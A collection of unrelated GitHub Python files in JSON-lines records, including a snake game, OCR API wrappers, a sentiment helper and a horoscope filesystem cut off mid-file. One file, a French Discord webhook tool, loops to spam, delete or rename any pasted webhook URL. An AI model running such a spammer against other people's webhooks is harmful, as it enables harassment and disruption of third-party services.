debug=True)","repo_name":"AdamFousek/python-restapi-files","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70155178651","text":"import requests\r\nimport os\r\nfrom colorama import init, Fore\r\nfrom dhooks import *\r\nimport time\r\ncooldown_spam = 0\r\n\r\n\r\ninit(convert=True)\r\n\r\n\r\n\r\nchoices = 'Webhooks Tools\\n\\n'+ Fore.RED + '[0] ' + Fore.GREEN + 'Webhook Sender \\n' + Fore.RED + '[1] ' + Fore.GREEN + 'Webhook Deleter \\n' + Fore.RED + '[2] ' + Fore.GREEN + 'Webhook Spammer \\n' + Fore.RED + '[3] ' + Fore.GREEN + 'Webhook Renamer \\n' \r\ndef main():\r\n os.system(\"cls\")\r\n os.system(\"color A\")\r\n\r\n print(choices)\r\n print()\r\n print()\r\n print()\r\n choice = input(\"Choice\" + Fore.RED + \" → \")\r\n \r\n if choice == '0':\r\n os.system(\"title Webhook Sender\")\r\n WebhookURL = input(Fore.GREEN + \"Veuillez envoyer le webhook\" + Fore.RED + \" →\t\")\r\n WebhookMSG = input(Fore.GREEN + \"Veuillez envoyer le message\" + Fore.RED + \" →\t\") \r\n hook = Webhook(WebhookURL)\r\n hook.send(WebhookMSG)\r\n os.system(\"cls\")\r\n input(Fore.WHITE + \"Message envoyé avec succès ! Veuillez appuyer sur entrée pour retourner dans le menu principal.\") \r\n main()\r\n \r\n \r\n \r\n\t\r\n if choice == '1': \r\n os.system(\"title Webhook Deleter\") \r\n Deleter = input(Fore.GREEN + \"Veuillez envoyer le webhook à supprimer\" + Fore.RED + \" →\t\") \r\n requests.delete(Deleter)\r\n print(\"Webhook: \" + Fore.RED + Deleter + \" a été supprimé avec succès !\") \r\n os.system(\"cls\") \r\n input(Fore.WHITE + \"Webhooks supprimé avec succès ! Veuillez appuyer sur entrée pour retourner dans le menu principal.\")\r\n main()\r\n \r\n if choice == '2': \r\n os.system(\"title Webhook Spammer\") \r\n webhookURL1 = input(Fore.GREEN + \"Veuillez envoyer le lien du webhook à spam\" + Fore.RED + \" →\t\")\r\n webhookMessage = input(Fore.GREEN + \"Veuillez envoyer le message à spam\" + Fore.RED + \" →\t\" )\r\n num = int(input(Fore.GREEN + \"Veuillez envoyer le nombre de message à spam\" + Fore.RED + \" →\t\"))\r\n hook1 = Webhook(webhookURL1)\r\n for i in range(num): \r\n f = i + 1\r\n e = f \r\n hook1 = Webhook(webhookURL1)\r\n hook1.send(webhookMessage)\r\n print(f'Message: {webhookMessage} | Nombre d\\'envoie(s): {f}/{num}')\r\n time.sleep(1.5)\r\n if f == num:\r\n input(Fore.WHITE + \"Spam effectué avec succès ! Veuillez appuyer sur entrée pour retourner dans le menu principal.\")\r\n main()\r\n \r\n \r\n if choice == '3': \r\n os.system(\"title Webhook Renamer\")\r\n webhookURL2 = input(Fore.GREEN + \"Veuillez envoyer le lien du webhook à renommer\" + Fore.RED + \" →\t\")\r\n webhookName = input(Fore.GREEN + \"Veuillez envoyer le nom du webhook\" + Fore.RED + \" →\t\" )\r\n r = requests.patch(webhookURL2, json={ \"name\":webhookName })\r\n input(Fore.WHITE + 'Le webhook a été renommé avec succès ! Veuillez appuyer sur entrée pour retourner dans le menu principal.')\r\n main()\r\n \r\n \r\n \r\n \r\n \r\n \r\nmain() \r\n\r\n","repo_name":"Azulix/VCH-Webhook","sub_path":"VCH-Webhook.py","file_name":"VCH-Webhook.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6997586463","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 27 14:24:21 2020\n\n@author: IssaCamara\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\n\ndef vectorize(X_train, X_val, y_train, y_val, tokenizer, max_length):\n\n X_train_vect = tokenizer.texts_to_sequences(X_train)\n X_val_vect = tokenizer.texts_to_sequences(X_val)\n \n X_train_vect = pad_sequences(X_train_vect, max_length)\n X_val_vect = pad_sequences(X_val_vect, max_length)\n return (X_train_vect, X_val_vect)\n \n\n\n\n\ndef predict_sentiment(text, model, tokenizer, max_length):\n text_vect = tokenizer.texts_to_sequences(pd.Series(text))\n \n text_vect = pad_sequences(text_vect, max_length)\n \n y_pred = model.predict_classes(text_vect)\n \n return y_pred\n\n\ndef predict_proba(text, model, tokenizer, max_length):\n\n text_vect = tokenizer.texts_to_sequences(pd.Series(text))\n \n text_vect = pad_sequences(text_vect, max_length)\n \n proba = model.predict(text_vect)\n \n return proba\n","repo_name":"issacamara/SentimentAnalysis","sub_path":"flaskr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29915813397","text":"\ndef is_astonishing(num):\n res, n = \"\", str(num)\n for i in range(1, len(n)):\n a,b = int(n[:i]), int(n[i:])\n (a,b), res = (sorted([a,b]), \"BA\") if a>b else ((a,b), \"AB\")\n if (b-a+1)*(a+b)/2 == num:\n return \"{}-Astonishing\".format(res)\n return False\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"76pRYoqrmEQQtFAME_23.py","file_name":"76pRYoqrmEQQtFAME_23.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5961576000","text":"\"\"\"\nCustom Seating Cards\n\nChapter 15 included a practice project to create custom invitations from\na list of guests in a word document. As an additional project, use the\npillow module to create images for custom seating cards for your guests.\n\nFor each of the guests listed in the guests.txt file, generate an image\nfile with the guest name and some flowery decoration. A public domain\nflower image is also available.\n\nTo ensure that each seating card is the same size, add a black rectangle\non the edges of the invitation image so that when the image is printed\nout, there will be a guideline for cutting.\n\nThe PNG files that Pillow produces are set to 72 pixels per inch, so a\n4×5-inch card would require a 288×360-pixel image.\n\"\"\"\n\nimport os\nfrom PIL import Image, ImageDraw, ImageFont\n\nFRAME_FILE = 'frame.png'\nGUESTS_FILE = 'guests.txt'\n\ndef get_guest_list(filename):\n \"\"\"Returns a justified list with all the names in 'filename'\"\"\"\n with open(filename) as file_obj:\n guests = file_obj.read().split('\\n')\n return center_names(guests)\n\ndef center_names(names_list):\n \"\"\"Returns a list with the names on 'names_list' center justified\"\"\"\n centered_names = []\n len_names = [len(name) for name in names_list]\n max_len = max(len_names)\n for name in names_list:\n centered_names.append(name.center(max_len))\n return centered_names\n\ndef draw_rectangle(image_obj):\n \"\"\"Draws a black guideline for cutting the card.\"\"\"\n draw = ImageDraw.Draw(image_obj)\n draw.rectangle((5, 5, 365, 293), outline='black')\n\ndef add_frame(image_obj):\n \"\"\"Adds a flowery frame to the card.\"\"\"\n frame = Image.open(FRAME_FILE)\n image_obj.paste(frame, (9, 9), frame)\n\ndef draw_guest_name(image_obj, guest_name):\n \"\"\"Draws the guest name\"\"\"\n draw = ImageDraw.Draw(image_obj)\n font_folder = '/usr/share/fonts/urw-base35/'\n font_name = 'Z003-MediumItalic.otf' #afm otf t1\n font = ImageFont.truetype(\n os.path.join(font_folder, font_name), 54)\n draw.text((60, 130), guest_name, fill='black', font=font)\n\ndef create_card(guest_name):\n \"\"\"Creates a seating card.\"\"\"\n img = Image.new('RGBA', (370, 298), 'white')\n draw_rectangle(img)\n add_frame(img)\n draw_guest_name(img, guest_name)\n img.save(f'{guest_name.strip()}.png')\n\n# Create guest list\nguest_list = get_guest_list(GUESTS_FILE)\n# Create a custom card for each guest in list\nfor guest in guest_list:\n create_card(guest)\n","repo_name":"xerifeazeitona/autbor","sub_path":"chapter19/projects/custom_seating_cards/custom_seating_cards.py","file_name":"custom_seating_cards.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"438616034","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.stats import binom\nfrom matplotlib import rcParams\n\n\n\"\"\"----Constants----\"\"\"\nn = 200\np = 0.1\n\n\"\"\"----Config----\"\"\"\nrcParams.update({'font.size': 11, 'interactive': False})\nWORLD = True\nSEED = True\n\n\ndef main():\n number_of_chunks = np.arange(200, dtype=int)\n world_probability = binom.pmf(number_of_chunks, n, p) * ((29999984 * (2/16)) ** 2)\n np.append(world_probability, [200, (1 / 10) ** 200 * (29999984 * (2 / 16)) ** 2]), np.append(number_of_chunks, [200])\n data_world = np.array([number_of_chunks, world_probability]).T\n np.savetxt('world_probability.txt', data_world, fmt=['%d', '%e'])\n\n if WORLD:\n print('---World---')\n print('n', 'P(x)')\n for i, j in data_world:\n print(int(i), j)\n\n plt.plot(number_of_chunks, world_probability)\n plt.yscale('log')\n plt.title('amount of slime chunks clusters per amount of slime chunks \\n on avg in a given world')\n plt.xlabel('number of chunks in cluster'), plt.ylabel('amount on avg in world')\n plt.savefig('slime_clusters.png')\n plt.show()\n\n if SEED:\n number_of_seeds = 18446744073709551616\n seed_probability = world_probability * number_of_seeds\n data_seed = np.array([number_of_chunks, seed_probability]).T\n np.savetxt('seed_probability.txt', data_seed, fmt=['%d', '%e'])\n\n print('---Seed---')\n print('n', 'P(x)')\n for i, j in data_seed:\n print(int(i), j)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"viktor40/SlimeChunkClusterStats","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20933884567","text":"#AUTHOR: Smayan Nirantare\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nimport sys, random, time\n\nclass MainWindow(QWidget):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setWindowTitle(\"Snake Game\")\n self.setGeometry(100, 100, COLS * CELL_SIZE, ROWS * CELL_SIZE + RELIEF)\n\n self.cells = [[QLabel(self) for i in range(COLS)] for j in range(ROWS)]\n\n loop = QTimer(self)\n loop.timeout.connect(self.mainLoop)\n loop.start(80)\n\n self.dirx = 0\n self.diry = 0\n self.row = 5\n self.col = 5\n\n self.snake_body = []\n self.pre_body = []\n self.snake_length = 1\n\n self.cells[self.row][self.col].setStyleSheet(\"border: 1px solid black; background-color: green\")\n self.food_row, self.food_col = self.getFoodPos()\n\n self.score_lbl = QLabel(self)\n self.score_lbl.setFont(FONT1)\n self.score_lbl.setGeometry(10, 0, 500, RELIEF)\n\n self.createGrid()\n\n def createGrid(self):\n x = 0\n y = RELIEF\n\n for row in range(ROWS):\n for col in range(COLS):\n cell = self.cells[row][col]\n \n #alligns text in label to the center\n cell.setAlignment(QtCore.Qt.AlignCenter)\n cell.setFont(FONT1)\n\n #determines placement and size of label\n cell.setGeometry(x, y, CELL_SIZE, CELL_SIZE)\n x += CELL_SIZE\n\n cell.setStyleSheet(\"border: 1px solid black; background-color: white\")\n x = 0\n y += CELL_SIZE\n\n \n def mainLoop(self):\n self.score_lbl.setText(\"Score: \" + str(self.snake_length))\n self.move()\n\n def move(self):\n self.row += self.diry\n self.col += self.dirx\n\n if self.col == -1:\n self.col = COLS - 1\n if self.row == -1:\n self.row = ROWS - 1\n if self.col == COLS:\n self.col = 0\n if self.row == ROWS:\n self.row = 0\n\n self.handleLength()\n\n color = LIGHT_GREEN\n for i, segment in enumerate(self.snake_body):\n if i == len(self.snake_body) - 1: color = GREEN\n\n self.cells[segment[0]][segment[1]].setStyleSheet(\"border: 1px solid black; background-color: \" + color) \n\n\n for row in range(ROWS):\n for col in range(COLS):\n if [row, col] not in self.snake_body:\n self.cells[row][col].setStyleSheet(\"border: 1px solid black; background-color: white\")\n \n \n self.cells[self.food_row][self.food_col].setStyleSheet(\"border: 1px solid black; background-color: red\")\n\n def handleLength(self):\n\n snake_head = []\n snake_head.append(self.row)\n snake_head.append(self.col)\n self.snake_body.append(snake_head)\n if len(self.snake_body) > self.snake_length:\n self.snake_body.pop(0)\n\n if self.snake_body[-1] in self.snake_body[:-1]:\n self.reset()\n\n if self.row == self.food_row and self.col == self.food_col:\n self.snake_length += 1\n self.food_row, self.food_col = self.getFoodPos()\n\n def getFoodPos(self):\n food_col = random.randint(0, COLS - 1) \n food_row = random.randint(0, ROWS - 1)\n \n return food_row, food_col\n\n def reset(self):\n time.sleep(1)\n self.dirx = 0\n self.diry = 0\n self.snake_length = 1\n self.snake_body.clear()\n\n self.row = 5\n self.col = 5\n\n self.food_row, self.food_col = self.getFoodPos()\n\n def keyPressEvent(self, event):\n if event.key() == QtCore.Qt.Key_Down and self.diry != -1:\n self.diry = 1\n self.dirx = 0\n elif event.key() == QtCore.Qt.Key_Up and self.diry != 1:\n self.diry = -1\n self.dirx = 0\n elif event.key() == QtCore.Qt.Key_Left and self.dirx != 1:\n self.dirx = -1\n self.diry = 0\n elif event.key() == QtCore.Qt.Key_Right and self.dirx != -1:\n self.dirx = 1\n self.diry = 0\n\n\ndef main():\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n app.exec_()\n\n\nROWS = 15\nCOLS = 15\nCELL_SIZE = 75\nRELIEF = 100\n\nFONT1 = QFont(\"Arial\", 20)\n\nRED = \"rgb(255, 0, 0)\"\nGREEN = \"rgb(0, 180, 0)\"\nLIGHT_GREEN = \"rgb(0, 255, 0)\"\nBLUE = \"rgb(0, 0, 255)\"\n\n\nif __name__ == '__main__':\n main()","repo_name":"Smayan-n/Snake-Game","sub_path":"Version2/snake_gameV2.py","file_name":"snake_gameV2.py","file_ext":"py","file_size_in_byte":4510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72252724891","text":"import numpy as np\nfrom matplotlib import colors, cm, pyplot as plt\nfrom eventio import SimTelFile\nfrom ctapipe.io import SimTelEventSource\nfrom ctapipe.visualization import CameraDisplay\n\nbad_pixels = {'color': 'black', 'alpha': 0.1}\ncw = cm.coolwarm\ncw.set_bad(**bad_pixels)\nvi = cm.viridis\nvi.set_bad(**bad_pixels)\n\np = \"build/simtel-output.zst\"\nf = SimTelFile(p)\ns = SimTelEventSource(p)\n\ngeom = s.subarray.tel[1].camera.geometry\n\nfig, (ax_im, ax_t) = plt.subplots(ncols=2, figsize=(8, 4))\n\ndisp_im = CameraDisplay(geom, ax=ax_im, cmap=vi)\ndisp_im.add_colorbar()\ndisp_t = CameraDisplay(geom, ax=ax_t, cmap=cw)\ndisp_t.add_colorbar()\n\nfig.tight_layout()\nfig.show()\n\n\ndef plot(pe):\n image = pe['photoelectrons']\n image[image == 0] = np.nan\n\n time = np.empty_like(image)\n mask = pe['pixel_id']\n time[:] = np.nan\n time[mask] = pe['time'] - np.mean(pe['time'])\n\n disp_im.image = image\n disp_t.image = time\n\n\nfor event in f.iter_mc_events():\n if event['photoelectrons'] != {}:\n pe = event['photoelectrons'][0]\n\n if np.sum(pe['photoelectrons']) > 100:\n plot(pe)\n plt.pause(0.2)\n","repo_name":"fact-project/sim_telarray_configuration","sub_path":"scripts/plot_event.py","file_name":"plot_event.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9600034938","text":"from flask import Flask, request\r\nfrom flask import jsonify\r\nimport json\r\nimport tg_logic_main\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/hello')\r\ndef hello():\r\n return jsonify(content=\"OK\")\r\n\r\n@app.route('/bot', methods=['POST'])\r\ndef bot():\r\n data = json.loads(request.get_data(as_text=True))\r\n res = tg_logic_main.flask_handler(data)\r\n return str(res)\r\n\r\nif __name__ == \"__main__\": \r\n app.run(port=5002)","repo_name":"kiands/ChatbotWithGraphDB","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26298949689","text":"from datetime import date\n\n\ndef create_client_insurance_default():\n client_insurance = {\n \"auto\": [\n {\"key\": 1, \"value\": \"regular\"}\n ],\n \"disability\": \"ineligible\",\n \"home\": [\n {\"key\": 1, \"value\": \"economic\"},\n {\"key\": 2, \"value\": \"regular\"}\n ],\n \"life\": \"regular\",\n \"umbrella\": \"regular\"\n }\n return client_insurance\n\n\ndef create_client_info_default():\n client_info = {\n \"age\": 35,\n \"dependents\": 1,\n \"houses\": [\n {\"key\": 1, \"ownership_status\": \"owned\"},\n {\"key\": 2, \"ownership_status\": \"mortgaged\"}\n ],\n \"income\": 0,\n \"marital_status\": \"married\",\n \"risk_questions\": [0, 1, 0],\n \"vehicles\": [\n {\"key\": 1, \"year\": int(date.today().strftime(\"%Y\")) - 1}\n ]\n }\n return client_info\n\n\ndef create_client_info_ineligible():\n client_info = {\n \"age\": 90,\n \"dependents\": 0,\n \"houses\": [],\n \"income\": 0,\n \"marital_status\": \"single\",\n \"risk_questions\": [0, 0, 0],\n \"vehicles\": []\n }\n return client_info\n\n\ndef create_client_info_economic():\n client_info = {\n \"age\": 35,\n \"dependents\": 0,\n \"houses\": [\n {\"key\": 1, \"ownership_status\": \"owned\"}\n ],\n \"income\": 1,\n \"marital_status\": \"married\",\n \"risk_questions\": [0, 0, 0],\n \"vehicles\": [\n {\"key\": 1, \"year\": 1900}\n ]\n }\n return client_info\n\n\ndef create_client_info_regular():\n client_info = {\n \"age\": 50,\n \"dependents\": 1,\n \"houses\": [\n {\"key\": 1, \"ownership_status\": \"owned\"}\n ],\n \"income\": 1,\n \"marital_status\": \"single\",\n \"risk_questions\": [0, 1, 0],\n \"vehicles\": [\n {\"key\": 1, \"year\": 1900}\n ]\n }\n return client_info\n\n\ndef create_client_info_responsible():\n client_info = {\n \"age\": 50,\n \"dependents\": 1,\n \"houses\": [\n {\"key\": 1, \"ownership_status\": \"mortgaged\"}\n ],\n \"income\": 1,\n \"marital_status\": \"married\",\n \"risk_questions\": [1, 1, 1],\n \"vehicles\": [\n {\"key\": 1, \"year\": int(date.today().strftime(\"%Y\"))}\n ]\n }\n return client_info\n\n\ndef create_client_insurance_ineligible():\n client_insurance = {\n \"auto\": \"ineligible\",\n \"disability\": \"ineligible\",\n \"home\": \"ineligible\",\n \"life\": \"ineligible\",\n \"umbrella\": \"ineligible\"\n }\n return client_insurance\n","repo_name":"leodecavalcante/origin-financial","sub_path":"tests/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10866285277","text":"import pygame\nimport config_screens\nfrom element_button import Button\n\nclass GameOver():\n\tdef __init__(self):\n\t\tself.restart_button = Button(25, 520, 300, 60, \"Play Again\")\n\t\tself.choose_level = Button(475, 520, 300, 60, \"Choose Level\")\n\n\tdef set(self, level):\n\t\tself.level = level\n\t\tif (pygame.display.Info().current_w != 800 or pygame.display.Info().current_h != 600):\n\t\t\tconfig_screens.set((800, 600))\n\t\tpygame.display.set_caption(\"Gave Over\")\n\t\tself.bg_image = pygame.image.load(\"img/bg/game-over-bg.png\")\n\t\n\tdef run(self):\n\t\twhile (True):\n\t\t\tconfig_screens.screen.blit(self.bg_image, (0, 0))\n\n\t\t\tself.restart_button.draw(config_screens.screen)\n\t\t\tself.choose_level.draw(config_screens.screen)\n\t\t\t\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tpos = pygame.mouse.get_pos()\n\n\t\t\t\tif (event.type == pygame.QUIT):\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\texit(0)\n\n\t\t\t\tif (event.type == pygame.MOUSEBUTTONDOWN):\n\t\t\t\t\tif self.restart_button.isOver(pos):\n\t\t\t\t\t\tconfig_screens.game_start.set(self.level)\n\t\t\t\t\t\tconfig_screens.game_start.run()\n\t\t\t\t\telif self.choose_level.isOver(pos):\n\t\t\t\t\t\tconfig_screens.choose_level.set(\"Choose Level\")\n\t\t\t\t\t\tconfig_screens.choose_level.run()\n\n\t\t\t\tif (event.type == pygame.MOUSEMOTION):\n\t\t\t\t\tself.restart_button.color = (20, 108, 148) if self.restart_button.isOver(pos) else (25, 167, 206)\n\t\t\t\t\tself.choose_level.color = (20, 108, 148) if self.choose_level.isOver(pos) else (25, 167, 206)\n\n\t\t\ttext = config_screens.font.render(\"Good Luck Next Time\", True, (20, 108, 148))\n\t\t\tconfig_screens.screen.blit(text, ((800 - text.get_width())//2, 250))\n\t\t\t\t\t\t\n\t\t\tpygame.display.update()\n\n\t\t\tconfig_screens.clock.tick(config_screens.fps)","repo_name":"NursultanAkhmetov/MineSweeper","sub_path":"screen_game_over.py","file_name":"screen_game_over.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26015665784","text":"# -*- coding: UTF-8 -*-\n\nimport time\nimport uuid\nimport base64\nimport urllib.parse\nimport hashlib\nimport requests\nfrom gl import Global\n\n\ndef get_file_content(file_path):\n with open(file_path, \"rb\") as fp:\n return fp.read()\n\n\ndef get_exp_account():\n url = Global.config.get_value(\"experience_account_url\")\n t = int(time.time())\n data = dict({\n \"token\": hashlib.md5(str(t).encode(\"utf-8\")).hexdigest().upper(),\n \"timestamp\": t\n })\n try:\n response = post_request(url, None, data).json()\n\n if response[\"status\"] == 0:\n return True, response[\"app_id\"], response[\"app_key\"]\n return False, None, None\n except:\n Global.gui.show_message_box(\"错误\", \"获取共享API过程中出现网络错误!\\n请检查网络连接后重试\")\n return False, None, None\n\n\ndef post_request(url, params, data):\n return requests.post(url, params=params, data=data)\n\n\nclass BdOcr:\n def __init__(self):\n self.api_key = Global.config.get_value(\"bd_api_key\")\n self.secret_key = Global.config.get_value(\"bd_secret_key\")\n self.token = None\n self.api_list = {\n \"general_basic\": self.__general_basic,\n \"general\": self.__general,\n \"accurate_basic\": self.__accurate_basic,\n \"accurate\": self.__accurate,\n \"web_image\": self.__web_image,\n }\n self.api_url_list = {\n \"token\": Global.config.get_value(\"bd_access_token_url\"),\n \"general_basic\": Global.config.get_value(\"bd_general_basic_url\"),\n \"general\": Global.config.get_value(\"bd_general_url\"),\n \"accurate_basic\": Global.config.get_value(\"bd_accurate_basic_url\"),\n \"accurate\": Global.config.get_value(\"bd_accurate_url\"),\n \"web_image\": Global.config.get_value(\"bd_web_image_url\")\n }\n\n def __del__(self):\n print(\"BdOcr has been destroyed.\")\n\n def get_token(self):\n params = {\n \"grant_type\": \"client_credentials\",\n \"client_id\": self.api_key,\n \"client_secret\": self.secret_key\n }\n response = requests.post(url=self.api_url_list[\"token\"], data=params).json()\n\n if isinstance(response.get(\"error\", -1), int):\n self.token = response[\"access_token\"]\n return True\n\n return False\n\n def __general_basic(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"general_basic\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": image2base64,\n \"language_type\": kwargs[\"lang\"],\n \"probability\": \"true\"\n }\n\n return post_request(ocr_url, params, data).json()\n\n def __general(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"general\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": image2base64,\n \"language_type\": kwargs[\"lang\"],\n \"probability\": \"true\"\n }\n\n return post_request(ocr_url, params, data).json()\n\n def __accurate_basic(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"accurate_basic\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": image2base64,\n \"probability\": \"true\"\n }\n\n return post_request(ocr_url, params, data).json()\n\n def __accurate(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"accurate\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": image2base64,\n \"probability\": \"true\"\n }\n\n return post_request(ocr_url, params, data).json()\n\n def __web_image(self, kwargs):\n image2base64 = base64.b64encode(get_file_content(kwargs[\"image\"]))\n ocr_url = self.api_url_list[\"web_image\"]\n params = {\n \"access_token\": self.token\n }\n data = {\n \"image\": image2base64\n }\n\n return post_request(ocr_url, params, data).json()\n\n def get_ocr(self, api=\"general_basic\", **kwargs):\n return self.api_list[api](kwargs)\n\n\nclass TxOcr:\n def __init__(self, _id, _key):\n self.app_id = _id\n self.app_key = _key\n self.general_ocr_url = Global.config.get_value(\"tx_general_ocr_url\")\n\n def __del__(self):\n print(\"TxOcr has been destroyed.\")\n\n @staticmethod\n def __generate_signature(_params, _app_key):\n _sorted_keys = sorted(_params.keys())\n _str = \"\"\n for _key in _sorted_keys:\n if _params[_key] == \"\":\n continue\n _str += urllib.parse.urlencode({_key: _params[_key]}) + \"&\"\n _str += \"app_key=\" + _app_key\n return hashlib.md5(_str.encode(\"utf-8\")).hexdigest().upper()\n\n def get_ocr(self, image):\n data = dict({\n \"app_id\": self.app_id,\n \"time_stamp\": int(time.time()),\n \"nonce_str\": uuid.uuid4().hex,\n \"image\": base64.b64encode(get_file_content(image))\n })\n\n data[\"sign\"] = self.__generate_signature(data, self.app_key)\n return post_request(self.general_ocr_url, None, data).json()\n","repo_name":"drsanwujiang/video-timeline-and-subtitle-extract","sub_path":"ocrapi.py","file_name":"ocrapi.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"32"} +{"seq_id":"42562861944","text":"import os\nimport sys\nimport bs4\nimport fuse\nimport tempfile\nimport requests\nimport textwrap\nimport argparse\n\n\n# Name must match the class that implements it.\n# Each of these will be a directory under the mountpoint.\nhoroscope_sites = ['Astrosage', 'Astroyogi', 'AstroyogiCareer', 'IndianAstrology2000']\n\n# Each of these will be a file under the directory\n# corresponding to the horoscope site.\nhoroscope_types = ['daily', 'weekly', 'monthly']\n\n# Default string to be displayed when unable to load page.\nNA = b\"Not available\\n\"\n\n\nclass Req(object):\n \"\"\"Get HTML page using requests and parse it using BeautifulSoup\"\"\"\n\n def __init__(self):\n super().__init__()\n\n\n def _get(self, url, timeout=30):\n try:\n response = requests.get(url, timeout=timeout)\n response.raise_for_status()\n return bs4.BeautifulSoup(response.text, \"html.parser\")\n except:\n return None\n\n\nclass Astrosage(Req):\n \"\"\"Horoscopes from www.astrosage.com\"\"\"\n\n def __init__(self, sunsign, moonsign):\n super().__init__()\n\n base_url = \"http://www.astrosage.com/horoscope/\"\n self.horoscope = {}\n for horoscope_type in horoscope_types:\n url = \"{}/{}-{}-horoscope.asp\"\n url = url.format(base_url, horoscope_type, moonsign)\n self.horoscope[horoscope_type] = self._parse_html(url, horoscope_type)\n\n\n def _parse_html(self, url, horoscope_type):\n soup = self._get(url)\n if soup:\n if horoscope_type == \"daily\":\n html_class_attr = \"ui-large-content-box\"\n else:\n html_class_attr = \"ui-sign-content-box\"\n content = soup.find(class_=html_class_attr).text\n content = textwrap.fill(content.strip()) + \"\\n\"\n return content.encode()\n else:\n return NA\n\n\nclass Astroyogi(Req):\n \"\"\"Horoscopes from www.astroyogi.com\"\"\"\n\n def __init__(self, sunsign, moonsign):\n super().__init__()\n\n base_url = \"https://www.astroyogi.com/horoscopes\"\n self.horoscope = {}\n for horoscope_type in horoscope_types:\n url = \"{}/{}/{}-free-horoscope.aspx\"\n url = url.format(base_url, horoscope_type, sunsign)\n self.horoscope[horoscope_type] = self._parse_html(url)\n\n\n def _parse_html(self, url):\n soup = self._get(url)\n if soup:\n content = soup.find(id=\"ContentPlaceHolder1_LblPrediction\").contents[0]\n content = textwrap.fill(content.strip()) + \"\\n\"\n return content.encode()\n else:\n return NA\n\n\nclass AstroyogiCareer(Req):\n \"\"\"Career horoscopes from www.astroyogi.com\"\"\"\n\n def __init__(self, sunsign, moonsign):\n super().__init__()\n\n base_url = \"https://www.astroyogi.com/horoscopes\"\n self.horoscope = {}\n for horoscope_type in horoscope_types:\n url = \"{}/{}/{}-career-horoscope.aspx\"\n url = url.format(base_url, horoscope_type, sunsign)\n self.horoscope[horoscope_type] = self._parse_html(url)\n\n\n def _parse_html(self, url):\n soup = self._get(url)\n if soup:\n content = soup.find(id=\"ContentPlaceHolder1_LblPrediction\").contents[0]\n content = textwrap.fill(content.strip()) + \"\\n\"\n return content.encode()\n else:\n return NA\n\n\nclass IndianAstrology2000(Req):\n \"\"\"Horoscopes from www.indianastrology2000.com\"\"\"\n\n def __init__(self, sunsign, moonsign):\n super().__init__()\n\n base_url = \"https://www.indianastrology2000.com/horoscope\"\n self.horoscope = {}\n for horoscope_type in horoscope_types:\n if horoscope_type == \"daily\":\n url = \"{}/index.php?zone=3&sign={}\"\n url = url.format(base_url, moonsign)\n self.horoscope[horoscope_type] = self._parse_html(url)\n elif horoscope_type == \"weekly\":\n # No weekly horoscope available.\n self.horoscope[horoscope_type] = NA\n elif horoscope_type == \"monthly\":\n url = \"{}/{}-monthly-horoscope.html\"\n url = url.format(base_url, moonsign)\n self.horoscope[horoscope_type] = self._parse_html(url)\n\n\n def _parse_html(self, url):\n soup = self._get(url)\n if soup:\n content = soup.find(class_=\"horoscope-sign-content-block\").text\n content = textwrap.fill(content.strip()) + \"\\n\"\n return content.encode()\n else:\n return NA\n\n\nclass HoroscopeFS(fuse.Operations):\n \"\"\"Virtual filesystem for aggregating horoscopes from various websites\"\"\"\n\n def __init__(self, sunsign, moonsign):\n # Get default stats for an empty directory and empty file.\n # The temporary directory and file are automatically 